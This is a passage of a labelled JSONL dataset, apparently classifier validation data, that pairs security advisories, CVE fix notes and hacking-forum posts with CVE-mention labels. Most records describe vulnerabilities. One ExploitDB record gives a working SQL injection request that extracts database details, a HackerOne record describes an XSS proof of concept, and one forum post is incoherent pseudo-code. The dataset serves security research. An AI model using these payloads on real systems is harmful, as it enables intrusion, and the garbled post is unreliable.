[CVE-2023-36792]( https://www.cve.org/CVERecord?id=CVE-2023-36792), [CVE-2023-36793]( https://www.cve.org/CVERecord?id=CVE-2023-36793), [CVE-2023-36792]( https://www.cve.org/CVERecord?id=CVE-2023-36794), [CVE-2023-36796]( https://www.cve.org/CVERecord?id=CVE-2023-36796) are all resolved by a single patch. Get [affected software](#affected-software) to resolve all of them.\n\n## Discussion\n\nDiscussion for this issue can be found at https://github.com/dotnet/runtime/issues/91947\n\n### Mitigation factors\n\nMicrosoft has not identified any mitigating factors for this vulnerability.\n\n## Affected software\n\n\n* Any .NET 7.0 application running on .NET 7.0.10 or earlier.\n* Any .NET 6.0 application running on .NET 6.0.21 or earlier.\n\nIf your application uses the following package versions, ensure you update to the latest version of .NET.\n\n### .NET 7\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.NETCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-arm64) | >= 7.0.0, <= 7.0.10 | 7.0.11\n[Microsoft.NETCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x64) | >= 7.0.0, <= 7.0.10 | 7.0.11\n[Microsoft.NETCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x86) | >= 7.0.0, <= 7.0.10 | 7.0.11\n\n### .NET 6\n\nPackage name | Affected version | Patched version\n------------ | ---------------- | -------------------------\n[Microsoft.NETCore.App.Runtime.win-arm64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-arm64) | >= 6.0.0, <= 6.0.21 | 6.0.22\n[Microsoft.NETCore.App.Runtime.win-x64](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x64) | >= 6.0.0, <= 6.0.21 | 6.0.22\n[Microsoft.NETCore.App.Runtime.win-x86](https://www.nuget.org/packages/Microsoft.NETCore.App.Runtime.win-x86) | >= 6.0.0, <= 6.0.21 | 6.0.22\n\n\n## Advisory FAQ\n\n### How do I know if I am affected?\n\nIf you have a runtime or SDK with a version listed, or an affected package listed in [affected software](#affected-software), you're exposed to the vulnerability.\n\n### How do I fix the issue?\n\n* To fix the issue please install the latest version of .NET 6.0 or .NET 7.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.\n* If you are using one of the affected packages, please update to the patched version listed above.\n* If you have .NET 6.0 or greater installed, you can list the versions you have installed by running the `dotnet --info` command. You will see output like the following;\n\n```\n.NET Core SDK (reflecting any global.json):\n\n Version: 6.0.300\n Commit: 8473146e7d\n\nRuntime Environment:\n\n OS Name: Windows\n OS Version: 10.0.18363\n OS Platform: Windows\n RID: win10-x64\n Base Path: C:\\Program Files\\dotnet\\sdk\\6.0.300\\\n\nHost (useful for support):\n\n Version: 6.0.5\n Commit: 8473146e7d\n\n.NET Core SDKs installed:\n\n 6.0.300 [C:\\Program Files\\dotnet\\sdk]\n\n.NET Core runtimes installed:\n\n Microsoft.AspNetCore.App 6.0.5 [C:\\Program Files\\dotnet\\shared\\Micros", "source": "github_advisory", "timestamp": "2023-09-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f93db1f66bfda3b00a1f", "text": "Hey! Thanks for reaching out. You’re more than welcome to jump on the squad and hack with us! You’ll just need to search for the team name strataGEM , then look for the the request to join button. I’ll be on the lookout and accept the request. After that I’ll shoot you a link to the discord. Look forward to hearing from you. -apollyon", "source": "hackthebox", "timestamp": "2022-09-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2817fd8ff27c86cd2e9c", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-01-01", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "fdf9f224210172a24bb1", "text": "CVE: CVE-2022-23059\n\n[{'lang': 'en', 'value': 'A Stored Cross Site Scripting (XSS) vulnerability exists in Shopizer versions 2.0 through 2.17.0 via the “Manage Images” tab, which allows an attacker to upload a SVG file containing malicious JavaScript code.'}]\n\nFix commit: working version 3.0.alpha", "source": "cvefixes", "timestamp": "2022-03-29", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b1be894881b10f74f2d6", "text": "CVE: CVE-2022-25898\n\n[{'lang': 'en', 'value': 'The package jsrsasign before 10.5.25 are vulnerable to Improper Verification of Cryptographic Signature when JWS or JWT signature with non Base64URL encoding special characters or number escaped characters may be validated as valid by mistake. Workaround: Validate JWS or JWT signature if it has Base64URL and dot safe string before executing JWS.verify() or JWS.verifyJWT() method.'}]\n\nFix commit: CVE-2022-25898 Security fix in JWS and JWT validation", "source": "cvefixes", "timestamp": "2022-07-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "649024918f601a4e9d22", "text": "CVE: CVE-2022-31071\n\n[{'lang': 'en', 'value': 'Octopoller is a micro gem for polling and retrying. Version 0.2.0 of the octopoller gem was published containing world-writeable files. Specifically, the gem was packed with files having their permissions set to `-rw-rw-rw-` (i.e. 0666) instead of `rw-r--r--` (i.e. 0644). This means everyone who is not the owner (Group and Public) with access to the instance where this release had been installed could modify the world-writable files from this gem. This issue is patched in Octopoller 0.3.0. Two workarounds are available. Users can use the previous version of the gem, v0.1.0. Alternatively, users can modify the file permissions manually until they are able to upgrade to the latest version.'}]\n\nFix commit: Merge pull request #25 from octokit/updates-release-steps-checks\n\nAdds details on how to run a manual file integrity check", "source": "cvefixes", "timestamp": "2022-06-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "9fb2a6c6d3a96b37e5f1", "text": "CVE: CVE-2021-4213\n\n[{'lang': 'en', 'value': 'A flaw was found in JSS, where it did not properly free up all memory. Over time, the wasted memory builds up in the server memory, saturating the server’s RAM. This flaw allows an attacker to force the invocation of an out-of-memory process, causing a denial of service.'}]\n\nFix commit: Fix memory leak on each TLS connection\n\nEach TLS connection is leaking a bunch of data that isn't in the heap\nand so after 25k requests Tomcat uses about 2.5GB resident memory.\n\nThere are large number of relationships that point at each other and we\nneed to break the cycle so JSSEngineReferenceImpl's finalizer can run\nand clear all the native resources these point at.\n\nThe lowest impact place to break the cycle was at SSLAlertEvent.engine.\nThis relationship doesn't seem to be used anywhere. Once the cycle is\nbroken, JSSEngineReferenceImpl can be garbage collected and the\nfinalizer can run.\n\nSigned-off-by: Chris Kelley ", "source": "cvefixes", "timestamp": "2022-08-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "0488485d35936cff9d70", "text": "This is the reply that helped me the most if you’re stuck. Happy Wizard hunting all!", "source": "hackthebox", "timestamp": "2022-10-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "06d92fe77c924396b3fb", "text": "CVE: CVE-2022-1849\n\n[{'lang': 'en', 'value': 'Session Fixation in GitHub repository filegator/filegator prior to 7.8.0.'}]\n\nFix commit: regenerate session on user update", "source": "cvefixes", "timestamp": "2022-05-24", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "52b35fa744716807bee9", "text": "CVE: CVE-2021-46461\n\n[{'lang': 'en', 'value': 'njs through 0.7.0, used in NGINX, was discovered to contain an out-of-bounds array access via njs_vmcode_typeof in /src/njs_vmcode.c.'}]\n\nFix commit: Added missing element in typeof table for DataView() type.\n\nPreviously, typeof operation for DataView object resulted\nin out of bounds array accessing.\n\nThis fixes #450 issue on Github.", "source": "cvefixes", "timestamp": "2022-02-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c974e4c0fae9821058fe", "text": "yeah happened to me just right now after exiting the shell all php files where getting me 504 @everyone here can u reset the machine", "source": "hackthebox", "timestamp": "2023-11-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2cedfff9ca8358860470", "text": "I was stuck on this too, simply because I wasn’t using sudo in my command. I STRONGLY DISAGREE that sudo should be a requirement for this question. Sudo is not required to read a pcap file in /tmp–even if sudo was used to create the pcap. Change my mind (this is a general comment, not a specific reply to @laurenchen0631 )", "source": "hackthebox", "timestamp": "2022-03-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e7e8a847dc86d9148a03", "text": "I tried all options and receive the error. I enter also listing the files on /var/lib/dpkg/info", "source": "hackthebox", "timestamp": "2023-07-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "ce1aae6291166fcdb83b", "text": "rufus/parrot\n\nok so im completly new, and need a little help here for a project annnnd i cant get parrot to run on my computer i tried creating a iso on a flkash drive and cannot get it to run whatso ever do i need to put a virtual machine along side of it?", "source": "parrotsec", "timestamp": "2023-01-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "203d442130a2f4cc26dd", "text": "YARP Denial of Service Vulnerability\n\n[Severity: HIGH]\n\n### Impact\n\nA denial of service vulnerability exists in how YARP processes input.\n\n### Patches\n\nIf you're using YARP `1.0.0`, you should update to NuGet package version [`1.0.1`](https://www.nuget.org/packages/Yarp.ReverseProxy/1.0.1).\nIf you're using YARP `1.1.0-RC.1`, you should update to NuGet package version [`1.1.0-rc.1.22211.2`](https://www.nuget.org/packages/Yarp.ReverseProxy/1.1.0-rc.1.22211.2).\n\nYou can do so by updating the `PackageReference` in your `.csproj` file\n```diff\n\n- \n- \n+ \n+ \n\n```\nor by selecting `1.0.1` in the NuGet UI inside Visual Studio (`Manage NuGet Packages` / `Updates`)\n![image](https://user-images.githubusercontent.com/25307628/162951795-a30f8ed7-77ef-4c4f-920e-58d9e1587ad1.png)\n\n### References\n\n[CVE-2022-26924](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26924)", "source": "github_advisory", "timestamp": "2022-04-22", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5698614d3806d33d8efc", "text": "CVE: CVE-2022-24881\n\n[{'lang': 'en', 'value': 'Ballcat Codegen provides the function of online editing code to generate templates. In versions prior to 1.0.0.beta.2, attackers can implement remote code execution through malicious code injection of the template engine. This happens because Velocity and freemarker templates are introduced but input verification is not done. The fault is rectified in version 1.0.0.beta.2.'}]\n\nFix commit: :lock: 修改模板引擎的默认安全策略,以防止RCE", "source": "cvefixes", "timestamp": "2022-04-26", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "98b2b3b7c62d763aeda5", "text": "First of all, I would like to advise you that hacking into someone's computer without their consent is illegal and unethical. It is important to respect people's privacy and security. Regarding your question, netstat -n is a command that displays the current TCP/IP connections on your computer, along with the associated IP addresses and port numbers. However, it does not provide information about the identities of the remote IP addresses. If you want to find the IP address of your friend, you can ask them directly or use a legitimate IP lookup tool. There are several websites and tools available online that can help you find the IP address of a person, such as whatismyip.com or iplocation.net. However, it is important to note that using these tools without the person's consent can be considered a violation of their privacy. It is important to always respect people's privacy and not engage in any illegal or unethical activities.", "source": "go4expert", "timestamp": "2023-04-25", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f167f8bc8707ceb5cba5", "text": "crankor: How will I know that they talk about Harry Potter, is that I have a crystal ball, These reots should improve the context,I know it’s about Harry because I’ve read it on the forum but I don’t know when it would have occurred to me that it was about Howards Academy I did parts of the assessment on several days, so I had no chance to still remember the name Harry from the previous exercise… Now I am stuck at the very last question: I found the second username and tries rockyou-30 as instructed. However, no chance to brute force into his SSH account. I tried both routes, from the internal 0.0.0.0.:80 address, as well the external IP address. Any additional suggestions or hints? Thank you!", "source": "hackthebox", "timestamp": "2022-01-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "0f53021ee6405d0f3c6f", "text": "@minTwin I recommend using the Visual Studio IDE(community), as for the libraries you wont need something too complex. The steps were all explained, you need to make a loop that sends something and until that something is found it will keep running. I also recommend having some “Console.Writeline” so that you’ll see how many attempts were made as well as knowing which string was the correct one", "source": "hackthebox", "timestamp": "2023-11-03", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d2e3a2ec46a232bfc194", "text": "Finally found the code injection that got the flag.txt to appear on the /tmp page, and I respawned the server to double check and make sure it was right. What did it was finding which URL-Encoded characters worked, where to input them, and most importantly, refreshing the /tmp webpage to see if the flag.txt appeared even though an error appeared under the “message alert” in Burp. I incorrectly assumed the error meant that the command was unsuccessful, oops…", "source": "hackthebox", "timestamp": "2022-07-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c94fe0a212565c84223f", "text": "If you can debug a bit, you will know ${LS_COLORS} doesn’t exist.", "source": "hackthebox", "timestamp": "2022-07-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "dee2920d0633a1e19b7d", "text": "Jenkins Thycotic DevOps Secrets Vault Plugin does not properly mask credentials\n\n[Severity: MEDIUM]\n\nMultiple Jenkins plugins do not properly mask (i.e., replace with asterisks) credentials printed in the build log from Pipeline steps like sh and bat, when both of the following conditions are met:\n\n- The credentials are printed in build steps executing on an agent (typically inside a node block).\n\n- Push mode for durable task logging is enabled. This is a hidden option in Pipeline: Nodes and Processes that can be enabled through the Java system property org.jenkinsci.plugins.workflow.steps.durable_task.DurableTaskStep.USE_WATCHING. It is also automatically enabled by some plugins, e.g., OpenTelemetry and Pipeline Logging over CloudWatch.\n\nThe following plugins are affected by this vulnerability:\n\n- Kubernetes 3909.v1f2c633e8590 and earlier (SECURITY-3079 / CVE-2023-30513)\n\n- Azure Key Vault 187.va_cd5fecd198a_ and earlier (SECURITY-3051 / CVE-2023-30514)\n\n- Thycotic DevOps Secrets Vault 1.0.0 (SECURITY-3078 / CVE-2023-30515)\n\nThe following plugins have been updated to properly mask credentials in the build log when push mode for durable task logging is enabled:\n\n- Kubernetes 3910.ve59cec5e33ea_ (SECURITY-3079 / CVE-2023-30513)\n\n- Azure Key Vault 188.vf46b_7fa_846a_1 (SECURITY-3051 / CVE-2023-30514)\n\nAs of publication of this advisory, there is no fix available for the following plugin:\n\n- Thycotic DevOps Secrets Vault 1.0.0 (SECURITY-3078 / CVE-2023-30515)", "source": "github_advisory", "timestamp": "2023-04-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "dd8d51112c9cb21ec3ce", "text": "CVE: CVE-2022-23615\n\n[{'lang': 'en', 'value': 'XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. In affected versions any user with SCRIPT right can save a document with the right of the current user which allow accessing API requiring programming right if the current user has programming right. This has been patched in XWiki 13.0. Users are advised to update to resolve this issue. The only known workaround is to limit SCRIPT access.'}]\n\nFix commit: XWIKI-5024: Document potentially saved with the wrong author\n* add an configuration off switch", "source": "cvefixes", "timestamp": "2022-02-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fd8cc4d58651e970489d", "text": "SnakeYaml Constructor Deserialization Remote Code Execution\n\n[Severity: HIGH]\n\n### Summary\nSnakeYaml's `Constructor` class, which inherits from `SafeConstructor`, allows\nany type be deserialized given the following line:\n\nnew Yaml(new Constructor(TestDataClass.class)).load(yamlContent);\n\nTypes do not have to match the types of properties in the\ntarget class. A `ConstructorException` is thrown, but only after a malicious\npayload is deserialized.\n\n### Severity\nHigh, lack of type checks during deserialization allows remote code execution.\n\n### Proof of Concept\nExecute `bash run.sh`. The PoC uses Constructor to deserialize a payload\nfor RCE. RCE is demonstrated by using a payload which performs a http request to\nhttp://127.0.0.1:8000.\n\nExample output of successful run of proof of concept:\n\n```\n$ bash run.sh\n\n[+] Downloading snakeyaml if needed\n[+] Starting mock HTTP server on 127.0.0.1:8000 to demonstrate RCE\nnc: no process found\n[+] Compiling and running Proof of Concept, which a payload that sends a HTTP request to mock web server.\n[+] An exception is expected.\nException:\nCannot create property=payload for JavaBean=Main$TestDataClass@3cbbc1e0\n in 'string', line 1, column 1:\n payload: !!javax.script.ScriptEn ... \n ^\nCan not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager\n in 'string', line 1, column 10:\n payload: !!javax.script.ScriptEngineManag ... \n ^\n\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:291)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.construct(Constructor.java:172)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructYamlObject.construct(Constructor.java:332)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructObjectNoCheck(BaseConstructor.java:230)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructObject(BaseConstructor.java:220)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.constructDocument(BaseConstructor.java:174)\n\tat org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:158)\n\tat org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:491)\n\tat org.yaml.snakeyaml.Yaml.load(Yaml.java:416)\n\tat Main.main(Main.java:37)\nCaused by: java.lang.IllegalArgumentException: Can not set java.lang.String field Main$TestDataClass.payload to javax.script.ScriptEngineManager\n\tat java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:167)\n\tat java.base/jdk.internal.reflect.UnsafeFieldAccessorImpl.throwSetIllegalArgumentException(UnsafeFieldAccessorImpl.java:171)\n\tat java.base/jdk.internal.reflect.UnsafeObjectFieldAccessorImpl.set(UnsafeObjectFieldAccessorImpl.java:81)\n\tat java.base/java.lang.reflect.Field.set(Field.java:780)\n\tat org.yaml.snakeyaml.introspector.FieldProperty.set(FieldProperty.java:44)\n\tat org.yaml.snakeyaml.constructor.Constructor$ConstructMapping.constructJavaBean2ndStep(Constructor.java:286)\n\t... 9 more\n[+] Dumping Received HTTP Request. Will not be empty if PoC worked\nGET /proof-of-concept HTTP/1.1\nUser-Agent: Java/11.0.14\nHost: localhost:8000\nAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\nConnection: keep-alive\n```\n\n### Further Analysis\nPotential mitigations include, leveraging SnakeYaml's SafeConstructor while parsing untrusted content.\n\nSee https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in#comment-64581479 for discussion on the subject.\n\n### Timeline\n**Date reported**: 4/11/2022\n**Date fixed**: [30/12/2022](https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/44)\n**Date disclosed**: 10/13/2022", "source": "github_advisory", "timestamp": "2022-12-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7da217c0aa78b92891af", "text": "CVE: CVE-2022-24762\n\n[{'lang': 'en', 'value': 'sysend.js is a library that allows a user to send messages between pages that are open in the same browser. Users that use cross-origin communication may have their communications intercepted. Impact is limited by the communication occurring in the same browser. This issue has been patched in sysend.js version 1.10.0. The only currently known workaround is to avoid sending communications that a user does not want to have intercepted via sysend messages.'}]\n\nFix commit: fix security issue with Cross-Domain communication #33", "source": "cvefixes", "timestamp": "2022-03-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "223e65adf5ac6b67b00b", "text": "UMAC - Universal Macintosh- Applet\n\nNow in brute force you got to ping the server for the access to winmap -Winamp is used for collection services based upon the status, or stats of the object … BASH Example > > .index = 0; > .num1 = “applet-data-usage”; > .interface = 1028; > > For (index = 0; index < 1028; ++num1){ > > > > ++index; > > ++num1; > > interface = interface * index; } $interface = num1; Usually used somewhat like a pointer class or integer there is another set Blockquote cat graph2.dll >> graph2.rar;", "source": "hackersploit", "timestamp": "2022-05-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2537fb2d3288c60bbdd8", "text": "Improper random number generation in github.com/coredns/coredns\n\n[Severity: MEDIUM]\n\n### Impact\n\nCoreDNS before 1.6.6 (using go DNS package < 1.1.25) improperly generates random numbers because math/rand is used. The TXID becomes predictable, leading to response forgeries.\n\n### Patches\nThe problem has been fixed in 1.6.6+.\n\n### References\n- [CVE-2019-19794](https://nvd.nist.gov/vuln/detail/CVE-2019-19794)\n\n### For more information\nPlease consult [our security guide](https://github.com/coredns/coredns/blob/master/.github/SECURITY.md) for more information regarding our security process.\n", "source": "github_advisory", "timestamp": "2022-03-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f40dea6c163ded6ffbae", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2023-07-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "e2177aa3c3cfd3d27865", "text": "Dig: is anyone familiar with this unexpected output?\n\nI was playing around with the dig command and received some unexpected output. Because I’m not familiar with it I thought I’d ask if anyone else has seen it before and can tell me to what it’s referring. Samples below: add 0x55b5a8f2f8b8 size 32 file …/crypto/lhash/lhash.c line 109 mctx 0x55b5a8e6ca40 add 0x55b5a8f28778 size 40 file …/crypto/buffer/buffer.c line 35 mctx 0x55b5a8e6ca40 add 0x55b5a8eb2178 size 592 file …/crypto/err/err.c line 689 mctx 0x55b5a8e6ca40 add 0x55b5a8eb93f8 size 20 file …/crypto/init.c line 66 mctx 0x55b5a8e6ca40 add 0x7f72e1c17010 size 56 file …/…/…/lib/isc/heap.c line 88 mctx 0x55b5a8dcf140 add 0x7f72e1c18010 size 224 file …/…/…/…/lib/isc/unix/socket.c line 4632 mctx 0x55b5a8dcf140 add 0x7f72e1c12230 size 32 file …/…/…/lib/isc/log.c line 1068 mctx 0x55b5a8dcf140", "source": "hackersploit", "timestamp": "2022-06-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "5cff1538fd9d3658b917", "text": "CVE: CVE-2022-31121\n\n[{'lang': 'en', 'value': 'Hyperledger Fabric is a permissioned distributed ledger framework. In affected versions if a consensus client sends a malformed consensus request to an orderer it may crash the orderer node. A fix has been added in commit 0f1835949 which checks for missing consensus messages and returns an error to the consensus client should the message be missing. Users are advised to upgrade to versions 2.2.7 or v2.4.5. There are no known workarounds for this issue.'}]\n\nFix commit: Check if inner consensus message is missing\n\nChange-Id: I06b466e6ff6d43f2b9804dd21185241716356050\nSigned-off-by: Yacov Manevich \n(cherry picked from commit 6e5e693a2d12aabee4bcf103ab7de3df4ccc49f9)", "source": "cvefixes", "timestamp": "2022-07-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6724ea2398b1c55cb349", "text": "CVE: CVE-2022-2210\n\n[{'lang': 'en', 'value': 'Out-of-bounds Write in GitHub repository vim/vim prior to 8.2.'}]\n\nFix commit: patch 8.2.5164: invalid memory access after diff buffer manipulations\n\nProblem: Invalid memory access after diff buffer manipulations.\nSolution: Use zero offset when change removes all lines in a diff block.", "source": "cvefixes", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "44c35bca4386c138ff1f", "text": "On the Guided Lab: Traffic Analysis Workflow section, there really should be a highly visible message to use the provided pcap in the guided-analysis.zip resource. I tried for some time trying to capture the required network traffic for the questions on the NoMachine host but never got anything that matched up with the questions being asked. Finally diving into the provided pcap, I found it instantly. I really think that an emphasis on using those provided resources would save people a lot of headache, especially in this introduction courses.", "source": "hackthebox", "timestamp": "2022-06-24", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "88fded51ab7a14212d21", "text": "[Cross-site Scripting (XSS) - Reflected] CVE-2021-42567 - Apereo CAS Reflected XSS on https://█████████\n\nApereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints. CAS is vulnerable to a Reflected Cross-Site Scripting attack, via POST requests sent to the REST API endpoints. The payload could be injected on URLs: /███████/. Malicious scripts can be submitted to CAS via parameters such as the ticket id or the username. That results in CAS rejecting the request and producing a response in which the value of the vulnerable parameter is echoed back, resulting in its execution.\n\nVULNERABLE SITE: https://██████████\n\nVULNERABLE ENDPOINT: https://███████/█████████/\n\nPROOF OF CONCEPT:\n-----------------------\n* It seems easy as you just need to drop the XSS payload inside the parameter \"username\" or at the end of the endpoint's path (in URL-encoded form, of course). Apereo CAS rejects the request and echoed back the ticket's ID or the username in the HTTP response without sanitizing.\n\n\n \n
    \n \" />\n \n
    \n \n\n\n* Save the above HTML code as xss.html\n* Open it on the browser \n* You can notice that the XSS is triggered via a POST request.\n\n## Impact\n\nApereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints. \n\nREFERENCES :\n---------------\n * https://apereo.github.io/2021/10/18/restvuln/\n * https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html\n * https://github.com/sudohyak/exploit/blob/dcf04f704895fe7e042a0cfe9c5ead07797333cc/CVE-2021-42567/README.md\n * https://nvd.nist.gov/vuln/detail/CVE-2021-42567\n * https://github.com/apereo/cas/releases\n\nBest Regards,\n3th1c_yuk1\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\nApereo CAS\n\n## CVE Numbers\nCVE-2021-42567\n\n## Steps to Reproduce\n* It seems easy as you just need to drop the XSS payload inside the parameter \"username\" or at the end of the endpoint's path (in URL-encoded form, of course). Apereo CAS rejects the request and echoed back the ticket's ID or the username in the HTTP response without sanitizing.\n\n\n \n
    \n \" />\n \n
    \n \n\n\n* Save the above HTML code as xss.html\n* Open it on the browser \n* You can notice that the XSS is triggered via a POST request.\n\n## Suggested Mitigation/Remediation Actions\nYou should check the server's version and update to ... not the versions 6.3.7.1 and 6.4.2, but the versions 6.3.7.4 and 6.4.4.2 to mitigate this XSS.", "source": "hackerone", "timestamp": "2022-03-18", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7eb01181e5370a6c6af1", "text": "Auto Dealer Management System v1.0 - SQL Injection on manage_user.php\n\n# Exploit Title: Auto Dealer Management System v1.0 - SQL Injection on manage_user.php\n# Exploit Author: Muhammad Navaid Zafar Ansari\n# Date: 18 February 2023\n\n\n### CVE Assigned:\n**[CVE-2023-0915](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0915)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0915) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0915)\n\n### Vendor Homepage:\n> https://www.sourcecodester.com\n### Software Link:\n> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)\n### Version:\n> v 1.0\n\n# Tested on: Windows 11\n\n### SQL Injection\n> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.\n### Affected Page:\n> manage_user.php\n\n> On this page id parameter is vulnerable to SQL Injection Attack\n\n> URL of the vulnerable parameter is: ?page=user/manage_user&id=*\n\n### Description:\n> The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below\n+ Admin user has full access to the system\n+ Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction)\n> Although, employee user doesn't have manage_user.php access but due to broken access control, employee could able to perform the SQL Injection by opening manage_user.php page. Therefore, low-privileged users could able to get the access full system.\n\n### Proof of Concept:\n> Following steps are involved:\n1. Employee guess the page manager_user.php and pass the random id parameter that parameter is vulnerable to SQL injection (?page=user/manage_user&id=1*)\n### Request:\n```\nGET /adms/admin/?page=user/manage_user&id=1%27+and+false+union+select+1,user(),@@datadir,4,database(),6,7,8,9,10,11--+- HTTP/1.1\nHost: localhost\nsec-ch-ua: \"Chromium\";v=\"109\", \"Not_A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5\nConnection: close\n```\n\n### Response:\n\n![image](https://user-images.githubusercontent.com/123810418/219888637-627e3abb-4b7a-45e6-a22c-3a5c11b75b61.png)\n\n### Recommendation:\n> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:\n```\nExample Code:\n$sql = $obj_admin->db->prepare(\"SELECT * FROM users where id = :id \");\n$sql->bindparam(':id', $id);\n$sql->execute();\n$row = $sql->fetch(PDO::FETCH_ASSOC);\n```\nThank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f6eb684167873042f97d", "text": "CVE: CVE-2022-23603\n\n[{'lang': 'en', 'value': 'iTunesRPC-Remastered is a discord rich presence application for use with iTunes & Apple Music. In code before commit 24f43aa user input is not properly sanitized and code injection is possible. Users are advised to upgrade as soon as is possible. There are no known workarounds for this issue.'}]\n\nFix commit: Merge pull request from GHSA-3xpp-rhqx-cw96\n\nsec fix", "source": "cvefixes", "timestamp": "2022-02-01", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "768cc605c722124822e3", "text": "CVE: CVE-2021-25992\n\n[{'lang': 'en', 'value': 'In Ifme, versions 1.0.0 to v.7.33.2 don’t properly invalidate a user’s session even after the user initiated logout. It makes it possible for an 